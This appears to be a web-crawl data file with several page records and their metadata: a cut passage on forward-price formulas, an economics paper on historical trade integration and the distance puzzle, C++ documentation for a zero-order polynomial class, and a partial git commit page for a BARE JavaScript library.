0.06 \\times \\frac { 9 }{ 12 } ) } = \\0.478 \\\\ \\end{aligned}  \\begin{aligned} &\\text{PV}(d(4)) = \\0.5 \\times e ^ { - ( 0.06 \\times \\frac { 12 }{ 12 } ) } = \\0.471 \\\\ \\end{aligned} The sum of these is1.927. This amount is then plugged into the dividend-adjusted forward price formula:\n\n \\begin{aligned} &F = ( \\100 - \\1.927 ) \\times e ^ { ( 0.06 \\times 1 ) } = \\104.14 \\\\ \\end{aligned}\n\n1:39\n\n#### Forward Contract\n\nTake the Next Step to Invest\n×\nThe offers that appear in this table are from partnerships from which Investopedia receives compensation. This compensation may impact how and where listings appear. Investopedia does not include all offers available in the marketplace.\nService\nName\nDescription" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88682216,"math_prob":0.9971568,"size":3095,"snap":"2022-40-2023-06","text_gpt3_token_len":793,"char_repetition_ratio":0.16240698,"word_repetition_ratio":0.008602151,"special_character_ratio":0.25880453,"punctuation_ratio":0.10785824,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9991106,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-02T10:29:49Z\",\"WARC-Record-ID\":\"<urn:uuid:c983bfb9-10af-4de5-af24-3e1456c0d993>\",\"Content-Length\":\"219783\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f65ca746-ed18-4c26-ba82-23918ee12829>\",\"WARC-Concurrent-To\":\"<urn:uuid:35865fb8-d6c3-4985-882c-08041739482f>\",\"WARC-IP-Address\":\"146.75.34.137\",\"WARC-Target-URI\":\"https://www.investopedia.com/terms/f/forwardprice.asp\",\"WARC-Payload-Digest\":\"sha1:TNIRVPSTMYFZH3SKWDOZQD3VTR6QQLPA\",\"WARC-Block-Digest\":\"sha1:G6S2X7WO4VGEDTLGHN4H5QYRFQVNHQ2M\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500017.27_warc_CC-MAIN-20230202101933-20230202131933-00301.warc.gz\"}"}
https://link.springer.com/article/10.1007/s11698-015-0130-5?error=cookies_not_supported&code=d6e60a5e-59ae-4e54-b8a7-ee83fd0fbf08
[ "# Historical trade integration: globalization and the distance puzzle in the long twentieth century\n\n## Abstract\n\nIn times of ongoing globalization, the notion of geographic neutrality expects the impact of distance on trade to become ever more irrelevant. However, over the last three decades a wide range of studies has found an increase in the importance of distance during the second half of the twentieth century. This paper tries to reframe this discussion by characterizing the effect of distance over a broader historical point of view. To make maximal use of the available data, we use a state-space model to construct a bilateral index of historical trade integration. Our index doubles to quadruples yearly data availability before 1950, allowing us to expand the period of analysis to 1880–2011. This implies that the importance of distance as a determinant of the changing trade pattern can be analyzed for both globalization waves. In line with O’Rourke (Politics and trade: lessons from past globalisations. Technical Report, Bruegel, 2009) and Jacks et al. (J Int Econ 83(2):185–201, 2011), we find that the first wave was marked by a strong, continuing decrease in the effect of distance. Initially, the second globalization wave started out similarly, but from the 1960s onward the importance of distance starts increasing. Nevertheless, this change is dwarfed by the strong decrease preceding it.\n\nThis is a preview of subscription content, access via your institution.\n\n1. The hti index is made available at: http://www.sherppa.ugent.be/hti/hti.html.\n\n2. In addition to freight rates and distance, Jacks et al. (2011) also control for tariffs, the gold standard, empire membership, railroad infrastructure, exchange rates, common language and shared borders.\n\n3. $$\\sqrt{X_{ij} X_{ji} / \\left( X_{ii} X_{jj} \\right) }$$, with $$X_{ij}$$ the exports from $$i$$ to $$j$$ and $$X_{ii}$$ the internal trade in country $$i$$. Internal trade is usually approximated by subtracting exports from GDP, even though this can cause negative values for small open economies. Alternative solutions include using tariff data (Head and Mayer 2013).\n\n4. Since we will estimate this model using Bayesian techniques, it would be more correct to use the term highest posterior density intervals, but for readability’s sake, we will use confidence interval throughout this paper.\n\n5. We are grateful to Beatrice Dedinger ([email protected]) for providing access to the unpublised RICardo data. It was converted from pounds to US dollars using the historical exchange rate from Williamson (2015).\n\n6. de la Escosura (2000) starts with current, exchange rate converted, GDPs and uses the shortcut method to compute the current, PPP converted, GDPs. Klasing and Milionis (2014) on the other hand start with Maddison’s GDPs in constant, PPP converted, 1990 US dollars and transform it using a GDP deflator in current US dollars. They subsequently transform this series into current, exchange rate converted, US dollars using a similar (but inverted) shortcut method.\n\n7. No of countries $$\\times$$ (no of countries $$-1$$) $$\\times$$ No of years (excl. World Wars) = $$225\\times 224 \\times (2011-1870+1-5-6).$$\n\n8. The Overseas Countries and Territories account for the remaining colonies after the year 2000.\n\n9. Initial tests found that the time dependency is the same for the vast majority of country couples: 94.4 % of the time $$T_{ij}$$ is not significantly different at the 1 % level from $$T_{jl}$$ with $$ij \\ne jl$$.\n\n10. The size of the dataset required the use of the resources of the Flemish Supercomputer Center, which was kindly provided by Ghent University, the Flemish Supercomputer Center (VSC), the Hercules Foundation and the Flemish Government—department EWI.\n\n11. $$hti^\\star _{ij,t} = (hti_{ij,t} - \\mu ) / \\sigma .$$\n\nWith $$\\mu = \\frac{\\sum _{i=1}^{n}\\sum _{j=1, j\\ne i}^n \\sum _{t=1}^T( hti_{ij,t} )}{n(n-1)T}$$ and $$\\sigma ^2 = \\frac{\\sum _{i=1}^{n}\\sum _{j=1, j\\ne i}^n \\sum _{t=1}^T (hti_{ij,t} - \\mu )^2}{n(n-1)T-1}.$$\n\n12. These and other yearly graphs are made available together with the indicator at http://www.sherppa.ugent.be/hti/hti.html.\n\n14. Multilateral resistance terms are country-specific barriers to trade that in this case are allowed to vary over time.\n\n15. Since the index is already normalized for the size of the sender country, the GDP of the sender country should actually be left out of the gravity model regressions. However, its inclusion did not significantly affect the results.\n\n16. The number of dyads covered increase more than sixfold between 1870 and 1880.\n\n## References\n\n• Alcalá F, Ciccone A (2004) Trade and productivity. Q J Econ 119(2):613–646\n\n• Arribas I, Pérez F, Tortosa-Ausina E (2011) A new interpretation of the distance puzzle based on geographic neutrality. Econ Geogr 87(3):335–362\n\n• Baldwin R, Taglioni D (2006) Gravity for dummies and dummies for gravity equations. Technical Report w12516, National Bureau for Economic Research\n\n• Barbieri K, Keshk O (2012) Correlates of war project trade data set codebook, verion 3.0. http://correlatesofwar.org\n\n• Barbieri K, Keshk O, Pollins B (2009) Trading data: evaluating our assumptions and coding rules. Confl Manag Peace Sci 26(4):471–491\n\n• Berthelon M, Freund C (2008) On the conservation of distance in international trade. J Int Econ 75(2):310–320\n\n• Bleaney M, Neaves AS (2013) Declining distance effects in international trade: some country-level evidence. World Econ 36(8):1029–1040\n\n• Bolt J, van Zanden J (2013) The first update of the maddison project; re-estimating growth before 1820. Maddison Project Working Paper 4. http://www.ggdc.net/maddison/maddison-project/data.htm\n\n• Bosquet C, Boulhol H (2013) What is really puzzling about the “distance puzzle”. Rev World Econ 151(1):1–21\n\n• Boulhol H, De Serres A (2010) Have developed countries escaped the curse of distance? J Econ Geogr 10(1):113–139\n\n• Brun JF, Carrère C, Guillaumont P, De Melo J (2005) Has distance died? evidence from a panel gravity model. World Bank Econ Rev 19(1):99–120\n\n• Buch CM, Kleinert J, Toubal F (2004) The distance puzzle: on the interpretation of the distance coefficient in gravity equations. Econ Lett 83(3):293–298\n\n• Carter CK, Kohn R (1994) On gibbs sampling for state space models. Biometrika 81(3):541–553\n\n• Coe DT, Subramanian A, Tamirisa NT (2007) The missing globalization puzzle: evidence of the declining importance of distance. IMF staff papers, pp 34–58\n\n• Crafts N (2004) Globalisation and economic growth: a historical perspective. World Econ 27(1):45–58\n\n• Dilip K (2003) The economic dimensions of globalization. Palgrave Macmillan, Hampshire\n\n• Disdier AC, Head K (2008) The puzzling persistence of the distance effect on bilateral trade. Rev Econ Stat 90(1):37–48\n\n• Durbin J, Koopman S (2012) Time series analysis by state space methods, 2nd edn. Oxford University Press, Oxford\n\n• de la Escosura LP (2000) International comparisons of real product, 1820–1990: an alternative data set. Explor Econ Hist 37:1–41\n\n• Estevadeordal A, Frantz B, Taylor AM (2002) The rise and fall of world trade, 1870–1939. Technical Report w9318, National Bureau of Economic Research\n\n• Fagiolo G, Reyes J, Schiavo S (2008) On the topological properties of the world trade web: a weighted network analysis. Phys A Stat Mech Appl 387(15):3868–3873\n\n• Feenstra RC, Inklaar R, Timmer MP (2013) The next generation of the penn world table. www.ggdc.net/pwt\n\n• Findlay R, O’Rourke KH (2007) Power and plenty: trade, war, and the world economy in the second millennium, vol 51. Princeton University Press, Princeton\n\n• Frances C (1997) The death of distance. Harvard Business School Press, Boston\n\n• Guimarães P, Portugal P (2009) A simple feasable alternative procedure to estimate models with high-dimensional fixed effects. IZA Discussion paper 3935\n\n• Head K, Mayer T (2013) Gravity equations: workhorse, toolkit, and cookbook. Center for Economic Policy Research 9322\n\n• Head K, Ries J (2001) The erosion of colonial trade linkages after independence. Am Econ Rev 91(4):858–876\n\n• Irwin DA, O’Rourke KH (2011) Coping with shocks and shifts: The multilateral trading system in historical perspective. Technical Report w17598, National Bureau of Economic Research\n\n• Jacks DS (2009) On the death of distance and borders: evidence from the nineteenth century. Econ Lett 105(3):230–233\n\n• Jacks DS, Meissner CM, Novy D (2010) Trade costs in the first wave of globalization. Explor Econ Hist 47(2):127–141\n\n• Jacks DS, Meissner CM, Novy D (2011) Trade booms, trade busts, and trade costs. J Int Econ 83(2):185–201\n\n• Kim CJ, Nelson CR (1999) State-space models with regime switching: classical and Gibbs-sampling approaches with applications. MIT Press, Cambridge\n\n• Klasing MJ, Milionis P (2014) Quantifying the evolution of world trade, 1870–1949. J Int Econ 92(1):185–197\n\n• Lampe M, Sharp P (2013) Tariffs and income: a time series analysis for 24 countries. Cliometrica 7(3):207–235\n\n• Lampe M, Sharp P (2015) Cliometric approaches to international trade. In: Diebolt C, Haupert M (eds) Handbook of cliometrics. Springer, Berlin\n\n• Larch M, Norbäck PJ, Sirries S, Urban D (2013) Heterogeneous firms, globalization and the distance puzzle. Technical Report, IFN Working Paper\n\n• Leamer EE, Levinsohn J (1995) International trade theory: the evidence. Handb Int Econ 3:1339–1394\n\n• Lin F, Sim N (2012) Death of distance and the distance puzzle. Econ Lett 116(2):225–228\n\n• Mongelli FP, Dorrucci E, Agur I (2005) What does european institutional integration tell us about trade integration. European Central Bank Occasional Paper Series 40\n\n• Morgenstern O (1962) On the accuracy of economic observations. Princeton University Press, Princeton\n\n• Newman M (2010) Networks: an introduction. Oxford University Press, Oxford\n\n• O’Rourke K (2009) Politics and trade: lessons from past globalisations. Technical Report, Bruegel\n\n• O’Rourke KH, Williamson JG (2004) Once more: When did globalisation begin? Eur Rev Econ Hist 8(1):109–117\n\n• Rayp G, Standaert S (2015) Measuring actual integration: An outline of a bayesian state-space approach. In: Lombaerde PD, Saucedo E (eds) Indicator-based monitoring of regional economic integration, UNU series on regionalism. Springer, Dordrecht\n\n• Sarkees MR, Wayman F (2010) Resort to war: 1816–2007. CQ Press, Washington, DC\n\n• Schiff M, Carrere C (2003) On the geography of trade: distance is alive and well. Available at SSRN 441467\n\n• Siliverstovs B, Schumacher D (2009) Disaggregated trade flows and the missing “globalization puzzle”. Econ Int 115(3):141–164\n\n• Silva JS, Tenreyro S (2006) The log of gravity. Rev Econ Stat 88(4):641–658\n\n• Singer JD, Bremer S, Stuckey J (1972) Capability distribution, uncertainty, and major power war, 1820–1965. In: Russet B (ed) Peace, war, and numbers. Sage, Beverly Hills, pp 19–48\n\n• Standaert S (2014) Divining the level of corruption: a bayesian state-space approach. J Comp Econ. doi:10.1016/j.jce.2014.05.007\n\n• Williamson SH (2015) What was the U.S. GDP then? Technical Report, Measuring Worth\n\n## Acknowledgments\n\nWe would like to thank Guillaume Daudin, Luca De Benedictis, Kevin O’Rourke and Eric Vanhaute for their feedback and suggestions, as well as the Flemish Supercomputer Center for allowing us access to its infrastructure. Funding for this research was provided by the Research Foundation - Flanders and the Belgian National Bank.\n\n## Author information\n\nAuthors\n\n### Corresponding author\n\nCorrespondence to Samuel Standaert.\n\n## Appendices\n\nSee Table 2.\n\n### Appendix 2: Estimating the state-space model\n\nTo estimate the state-space model, we need to solve for the structural parameters of the state-space model ($$C$$, $$Z$$, $$T_t$$, $$H$$ and $$Q$$) as well as the level of trade integration ($$hti$$). While it is possible to maximize the combined distribution numerically for small datasets, using a Gibbs sampler simplifies the estimation procedure considerably by splitting up the process into conditional probabilities.\n\nFor example, say we have to draw from the joint probability of two variables $$p(A,B)$$, when only the conditional probability of $$p(A|B)$$ and $$p(B|A)$$ are known. Starting from a (random) value $$b_0$$, the Gibbs sampler will draw a first value of A conditional on $$B^{(0)}$$: $$A^{(1)} \\sim p(A|B^{(0)})$$. Conditional on this last draw, a value of B is drawn ($$B^{(1)} \\sim p(B|A^{(1)})$$) which is in turn used to draw a new value for A ($$A^{(2)} \\sim p(A|B^{(1)})$$. This process is repeated thousands of times, until the draws from the conditional distributions have converged to those of the combined distribution $$p(A,B)$$. After discarding the unconverged draws (the burn-in), the remaining draws of A and B can be used to reconstitute their respective (unconditional) distributions.\n\nBecause we are using a Bayesian analysis framework, we have to be explicit about the prior distribution of the parameters. In other words, we have to state what we know about their distribution before looking at the data. Because there is no prior information, we imposed flat priors on $$Z$$, $$C$$ and $$log(H)$$, meaning that all values in the real space (or real positive space for the variance H) are equally probable.\n\nIn the case of the state-space model, the Gibbs sampler consists of two main blocks (Kim and Nelson 1999):\n\n1. 1.\n\nIf the level of trade integration ($$hti$$) was known, the parameters of the measurement and state equations (Eqs. 1 and 2) could be obtained using simple linear regressions. To ensure the model is identified, the variance of the error term of the state equation ($$Q$$) is typically set to 1. Taking, for example, the situation, where there is only one dyad to simplify notation: $$hti = (hti_{1},\\ldots , hti_{n})'$$\n\n$$p(T|hti)\\propto .5 * 1\\!\\!1_{|T|\\le 1} * N(b_T, v_T)$$\n(8)\n$$p(Z^k,C^k|hti,y,H)\\propto N(b^k_{Z,C}, v^k_{Z,C})$$\n(9)\n$$p(H_{(k,k)}|hti,y)\\propto iWish[e^{k\\prime } e^k ; \\; n ]$$\n(10)\n\nwith $$v_T = (T_{t-1}'T_{t-1})^{-1}$$; $$b_T = v_T * T_{t-1}'T_t$$; $$v^k_{Z,C} = (hti'hti)^{-1}*H_{(k,k)}$$; $$b^k_{Z,C} = (hti'hti)^{-1} * hti'y^k$$; $$e^k = y^k - C^k - Z^k * hti$$; and $$iWish$$ the inverse Wishart distribution.\n\n2. 2.\n\nConditional on the parameters of the state and measurement equations, the distribution of $$hti$$ can be computed and drawn using the Carter and Kohn (1994) simulation smoother.\n\n• The Kalman filter: computes the distribution of $$hti$$ conditional on the information in all previous years. Starting from a wild guess, $$p(hti_0) = N(0,\\infty )$$, the following equations are iteratively solved for $$t = 1$$ to $$t = n$$:\n\n\\begin{aligned} a_{t|t}&= E(hti_t | y_1, \\ldots , y_t) \\nonumber \\\\&= T*a_{t-1|t-1} + \\kappa (y_t - C - Z T a_{t-1|t-1}) \\end{aligned}\n(11)\n\\begin{aligned} p_{t|t}&= V(hti_t | y_1, \\ldots , y_t) \\nonumber \\\\&= p_{t|t-1} + \\kappa Z p_{t-1|t-1} \\end{aligned}\n(12)\n\nwith $$\\kappa = p_{t|t-1} Z'(Z p_{t|t-1} Z' + H)^{-1}$$; and $$p_{t|t-1} = Tp_{t-1|t-1}T'+Q$$.\n\n• Simulation smoother: Draws from the distribution of $$hti$$ conditional on all information in the data and the previous draws. Starting from the last iteration of the Kalman filter, draw $$\\hat{hti}_n$$ from $$N(a_{n|n}; \\;p_{n|n})$$ and iterate backwards from $$t=n-1$$ to $$t=1$$:\n\n\\begin{aligned} a_{t|n}&= E(hti_t | y_1, \\ldots y_n) \\nonumber \\\\&= a_{t|t} + \\varsigma (\\hat{hti}_{t+1} - Ta_{t|t}) \\end{aligned}\n(13)\n\\begin{aligned} p_{t|n}&=V(hti_t | y_1, \\ldots y_n) \\nonumber \\\\&=p_{t|t} + \\varsigma (p_{t+1|n} - Tp_{t|t}T'-Q)\\varsigma ' \\end{aligned}\n(14)\n\nwith $$\\varsigma = p_{t|t}T'p_{t+1|t}^{-1}$$; and $$\\hat{hti}_{t+1}$$ a random draw from $$N(a_{t+1|n}; \\; p_{t+1|n})$$.\n\n### Appendix 3: The historical trade network\n\nIn order to combine the historical trade integration indices into a network, the index values corresponding to countries that are integrated need to be separated from those corresponding to countries that are not. A natural way of making this distinction is to contrast countries that trade with each other ($$X_{ij,t} > 0$$) to those that do not ($$X_{ij,t} = 0$$). The problem is that this approach is skewed by a large number of very small nonzero trade flows.\n\nRather than choosing an arbitrary cut-off value, the hti allows us to use significant differences to determine which countries are linked. To start, we used the estimates of the structural parameters of the state-space model to generate index values for a fictional dyad where trade was zero for the entire period. Labeling these observations as $$hti_{0,t}$$, we defined significant levels of trade in the following way: An edge $$e$$ from country $$i$$ to country $$j$$ exists if, and only if, its level of trade in year $$t$$ is significantly higher than that of $$hti_{0,t}$$: $$e_{ij,t} = 1 \\iff \\, hti_{0,t} < hti_{ij,t}$$ in at least 99 % of all iterations of the (converged) Gibbs sampler. Using the $$hti_{0,t}$$ definition, 115,911 edges were identified (6.3 % of observations).\n\nPanel a of Fig. 7 shows the overall network density (the fraction of dyads that are connected) gradually decreasing throughout the first globalization wave. In contrast, the trade network becomes increasingly connected during the second globalization wave. As can be seen in panel b, the number of trade links (edges) more or less continuously grows over the entire time-period and is initially offset by the rapid rise in the number of countries. This is especially noticeable when the Soviet Block breaks up in the 1990s, causing a rapid downward shift in the network density.\n\nSimilar to the distance regressions, the density was also computed when the number of countries was kept constant using the 1880 and 1950 subsets. This reveals that the decrease in density during the first globalization wave was driven by the addition of new countries. When this is kept constant, the network density almost doubles during the first wave. In addition, it reinforces the effects of the 1930 and 2008 economic crises, both causing a substantial drop in the density. To ensure that these results were not driven by the inclusion of the colonial trade data, the density was also computed using only the official countries according to the COW state system dataset. However, this did not significantly alter the conclusion (available upon request). In other words, once the density is corrected for the increasing number of countries, it conforms to the globalization pattern found in the literature.\n\n### Appendix 4: Estimating models with high-dimensional fixed effects\n\nFollowing Guimarães and Portugal (2009), the number of fixed effects can be reduced by half by first demeaning both dependent and explanatory variables in the sender-year dimension, leaving only the sender-target dummies. Using conditional probabilities, the fixed effects ($$c_i$$) can be separated from the explanatory variables ($$X_{i,t}$$), which significantly reduces the size of the matrix that needs to be inverted.\n\n$$y_{i,t} = c_i + X_{i,t} \\beta + \\epsilon _{i,t} \\quad \\hbox {with } \\epsilon _{i,t} \\sim N(0,\\sigma ^2)$$\n(15)\n\nEquation 15 can be estimated using a three-step Gibbs sampling procedure. For example, when using flat (uninformative) priors, the conditional probabilities are:\n\n1. 1.\n\n$$\\beta | c_i, \\sigma ^2 \\sim N(e_\\beta ,v_\\beta )$$\n\n$$e_\\beta = (X'X)^{-1}(X'(y-c))$$ with $$\\{X\\}_{i,t} = X_{i,t}$$ and $$\\{y-c\\}_{i,t} = y_{i,t}-c_i$$\n\n$$v_\\beta = \\sigma ^2 (X'X)^{-1}$$\n\n2. 2.\n\n$$c_i | beta, \\sigma ^2 \\sim N(\\bar{c_i},\\sigma ^2/n)$$\n\n$$\\bar{c_i} = \\sum ^n_t(y_{i,t} - X_{i,t}\\beta )/n$$ with $$n$$ the number of observations of country $$i$$\n\n3. 3.\n\n$$\\sigma ^2 | beta, c_i \\sim \\hbox {iWishart}(e'e,N)$$\n\n$$e = y_{i,t} - c_i - X_{i,t}\\beta$$\n\n### Appendix 5: Country subsets\n\nGroup 1: included in 1880< and 1950<\nAlgeria Egypt Italy Romania\nAscension Falkland Isl. Japan Senegal\nAustralia Fiji Liberia Sierra Leone\nAustria Finland Luxembourg Singapore\nBelize Germany Maldives Sri Lanka\nBermuda Ghana Malta St. Pierre and Miquelon\nBolivia Gibraltar Mauritius Suriname\nBrazil Greece Mexico Sweden\nChile Guyana Netherlands Trinidad and Tobago\nChina Haiti New Zealand Tunisia\nColombia Honduras Nicaragua Turkey\nCosta Rica Hong Kong Norway UK\nCuba Iceland Paraguay USA\nDenmark India Peru Uruguay\nDominican Rep. Indonesia Philippines Venezuela\nDutch Antilles Iran Portugal Yugoslavia\nGroup 2: included in 1950<\nAfghanistan Djibouti Lebanon Saint Lucia\nAlbania Dominica Lesotho Saint Vincent\nAmerican Samoa Equatorial Guinea Libya Samoa\nAngola Eritrea Lithuania Sao Tome and Principe\nAntigua and Barbuda Estonia Malawi Saudi Arabia\nBahamas Ethiopia Malaysia Seychelles\nBahrain Faroe Islands Mali Solomon Islands\nBenin Gabon Mongolia South Korea\nBosnia Gambia N. Mariana Isl. St. Kitts and Nevis\nBotswana Greenland Namibia Sudan\nBurkina Faso Guam Nepal Syria\nBurma Guinea New Caledonia Tanzania\nBurundi Guinea-Bissau Niger Togo\nCambodia Hungary Nigeria Tonga\nCameroon Iraq North Korea Tuvalu\nCape Verde Ireland Oman UAE\nCentral African Rep. Israel Pakistan Uganda" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79190254,"math_prob":0.9839631,"size":10405,"snap":"2022-27-2022-33","text_gpt3_token_len":3282,"char_repetition_ratio":0.0987405,"word_repetition_ratio":0.014059754,"special_character_ratio":0.3146564,"punctuation_ratio":0.10332103,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99080557,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-26T12:45:52Z\",\"WARC-Record-ID\":\"<urn:uuid:7bf3406d-9d5e-46f5-90dd-0c799c4c5a4e>\",\"Content-Length\":\"222089\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b6a1649e-4891-462d-b8ff-1d2ca46cf97b>\",\"WARC-Concurrent-To\":\"<urn:uuid:eff04e9c-adbd-4ca6-afba-d14be6bff7c9>\",\"WARC-IP-Address\":\"146.75.32.95\",\"WARC-Target-URI\":\"https://link.springer.com/article/10.1007/s11698-015-0130-5?error=cookies_not_supported&code=d6e60a5e-59ae-4e54-b8a7-ee83fd0fbf08\",\"WARC-Payload-Digest\":\"sha1:CSDUMBIXM7DEQBUSI3KXWSWA5BOTPNVB\",\"WARC-Block-Digest\":\"sha1:4BDWDX65H7Q6EMGVYKFDGGBRE36HE27V\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103205617.12_warc_CC-MAIN-20220626101442-20220626131442-00156.warc.gz\"}"}
https://docs.ros.org/en/noetic/api/ecl_geometry/html/classecl_1_1Polynomial_3_010_01_4.html
[ "ecl::Polynomial< 0 > Class Reference\n\nSpecialisation for the zero-th order polynomial. More...\n\n`#include <polynomial.hpp>`\n\n## Public Types\n\ntypedef Array< double, 1 > Coefficients\nThe coefficient container storage type. More...\n\n## Public Member Functions\n\nCoefficientscoefficients ()\nHandle to the coefficient array, use to initialise the polynomial. More...\n\nconst Coefficientscoefficients () const\nNon-modifiable handle to the coefficient array. More...\n\ndouble dderivative (const double &) const\nAccess the second derivative directly (always returns 0).. More...\n\nPolynomial< 0 > derivative () const\nDerivative of a zero'th order polynomial is always zero. More...\n\ndouble derivative (const double &) const\nAccess the derivative directly (always returns 0). More...\n\ndouble operator() (const double &) const\nAccess the value of the polynomial at the specified point. More...\n\nPolynomial ()\nDefault constructor. More...\n\nvoid shift_horizontal (const double &)\nHorizontal shift transform. More...\n\nvirtual ~Polynomial ()\n\n## Private Attributes\n\nCoefficients coeff\n\n## Detailed Description\n\nSpecialisation for the zero-th order polynomial.\n\nRepresents a zero'th order polynomial (scalar). It is necessary to handle this separately as the derivatives do not return lower degree polynomials.\n\nPolynomial, Math::Polynomials.\n\nDefinition at line 285 of file polynomial.hpp.\n\n## ◆ Coefficients\n\n typedef Array ecl::Polynomial< 0 >::Coefficients\n\nThe coefficient container storage type.\n\nDefinition at line 290 of file polynomial.hpp.\n\n## ◆ Polynomial()\n\n ecl::Polynomial< 0 >::Polynomial ( )\ninline\n\nDefault constructor.\n\nThis initialises the scalar coefficient for the zero'th polynomial to zero.\n\nDefinition at line 301 of file polynomial.hpp.\n\n## ◆ ~Polynomial()\n\n virtual ecl::Polynomial< 0 >::~Polynomial ( )\ninlinevirtual\n\nDefinition at line 302 of file polynomial.hpp.\n\n## ◆ coefficients() [1/2]\n\n Coefficients& ecl::Polynomial< 0 >::coefficients ( )\ninline\n\nHandle to the coefficient array, use to initialise the polynomial.\n\nThis returns a handle to the coefficient array. Use this with the comma initialiser to conveniently set the polynomial.\n\nPolynomial<0> p;\np.coefficients() = 1;\ncout << p << endl; // 1.00\nReturns\nCoefficients& : reference to the co-efficient array.\n\nDefinition at line 366 of file polynomial.hpp.\n\n## ◆ coefficients() [2/2]\n\n const Coefficients& ecl::Polynomial< 0 >::coefficients ( ) const\ninline\n\nNon-modifiable handle to the coefficient array.\n\nReturns\nconst Coefficients& : non-modifiable reference to the co-efficient array.\n\nDefinition at line 372 of file polynomial.hpp.\n\n## ◆ dderivative()\n\n double ecl::Polynomial< 0 >::dderivative ( const double & ) const\ninline\n\nAccess the second derivative directly (always returns 0)..\n\nAccess the values of the second derivative directly (always returns 0)..\n\nReturns\ndouble : 2nd derivative of a scalar is always 0.0.\n\nDefinition at line 345 of file polynomial.hpp.\n\n## ◆ derivative() [1/2]\n\n Polynomial<0> ecl::Polynomial< 0 >::derivative ( ) const\ninline\n\nDerivative of a zero'th order polynomial is always zero.\n\nDerivative of a zero'th order polynomial is always zero.\n\nReturns\nPolynomial<0> : the zero polynomial.\n\nDefinition at line 325 of file polynomial.hpp.\n\n## ◆ derivative() [2/2]\n\n double ecl::Polynomial< 0 >::derivative ( const double & ) const\ninline\n\nAccess the derivative directly (always returns 0).\n\nAccess the values of the derivative directly (always returns 0)..\n\nReturns\ndouble : derivative of a scalar is always 0.0.\n\nDefinition at line 335 of file polynomial.hpp.\n\n## ◆ operator()()\n\n double ecl::Polynomial< 0 >::operator() ( const double & ) const\ninline\n\nAccess the value of the polynomial at the specified point.\n\nAccess the value of the polynomial at the specified point.\n\nReturns\ndouble : the value of a scalar is always a_0.\n\nDefinition at line 381 of file polynomial.hpp.\n\n## ◆ shift_horizontal()\n\n void ecl::Polynomial< 0 >::shift_horizontal ( const double & )\ninline\n\nHorizontal shift transform.\n\nNormally, shifts the polynomial along the x axis by the specified offset, but in the case of this specialisation, does not change the polynomial.\n\nDefinition at line 313 of file polynomial.hpp.\n\n## ◆ coeff\n\n Coefficients ecl::Polynomial< 0 >::coeff\nprivate\n\nDefinition at line 383 of file polynomial.hpp.\n\nThe documentation for this class was generated from the following file:\n\necl_geometry\nAuthor(s): Daniel Stonier\nautogenerated on Sun Aug 2 2020 03:12:16" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6579671,"math_prob":0.5607292,"size":2996,"snap":"2021-31-2021-39","text_gpt3_token_len":637,"char_repetition_ratio":0.19919786,"word_repetition_ratio":0.2476415,"special_character_ratio":0.22897196,"punctuation_ratio":0.1904762,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9948363,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-25T17:36:32Z\",\"WARC-Record-ID\":\"<urn:uuid:6dde5bb0-c95b-46fb-aa25-a58bd903bd95>\",\"Content-Length\":\"24672\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0fb88dfa-8c97-476a-8f06-dbd1a88e1bf3>\",\"WARC-Concurrent-To\":\"<urn:uuid:a75ce35a-81a7-484b-abcc-7a8d7a14dd90>\",\"WARC-IP-Address\":\"140.211.9.98\",\"WARC-Target-URI\":\"https://docs.ros.org/en/noetic/api/ecl_geometry/html/classecl_1_1Polynomial_3_010_01_4.html\",\"WARC-Payload-Digest\":\"sha1:4JGCXRC37S7VFGIDODS7WGJQTXVS24U2\",\"WARC-Block-Digest\":\"sha1:OHQN3N3RATVT7JAVWOW2HEPW45CLB4BV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057733.53_warc_CC-MAIN-20210925172649-20210925202649-00488.warc.gz\"}"}
https://git.sr.ht/~kiito/bare-js/commit/1746c5aa62555c0f8b3b9644f60b021a08d303e3
[ "## ~kiito/bare-js\n\n1746c5aa62555c0f8b3b9644f60b021a08d303e3 — Emma 11 months ago\n```Enums implemented, un-broke Structs\n```\n```3 files changed, 106 insertions(+), 17 deletions(-)\n\nM README.md\nM example.js\nM lib-bare.js\n```\n`M README.md => README.md +9 -7`\n```@@ 4,25 4,27 @@ This is a work-in-progress JavaScript/Node.js implementation of [BARE](https://b\n\nThe idea so far is, that the parser and converter will run with node.js, while the resulting JavaScript classes should be usable in any JavaScript environment.\n\n-Have a look at `examples.js` on how to create type definitions in code for now.\n+Have a look at `examples.js` on how to create type definitions in code for now.\n+\nOr peek inside the `lib-bare.js`, where all conversion classes are located.\n-These are to be used directly when defining your own type.\n+These are to be used directly when defining your own type.\nWhenever a type takes some sort of arguments, they are static variables right at the top,\njust make sure to set them correctly since there are, as of now, no integrity checks on them.\n\n###What is still missing\n* The schema to js translator.\n- * Union and Enum types.\n- These are difficult to translate to js, so I'm going to have to think about use cases and how to make them convenient to use\n+ * Union type, this one is difficult to translate to js, so I'm going to have to think about use cases and how to make them convenient to use\n* Conversion error handling and integrity verification.\n* Unit tests, these will come last.\n\n###A note about Number and 64 bits\nJavascript is a wonderful language, and as such it doesn't use an integer type for numbers.\nInstead, every single number is 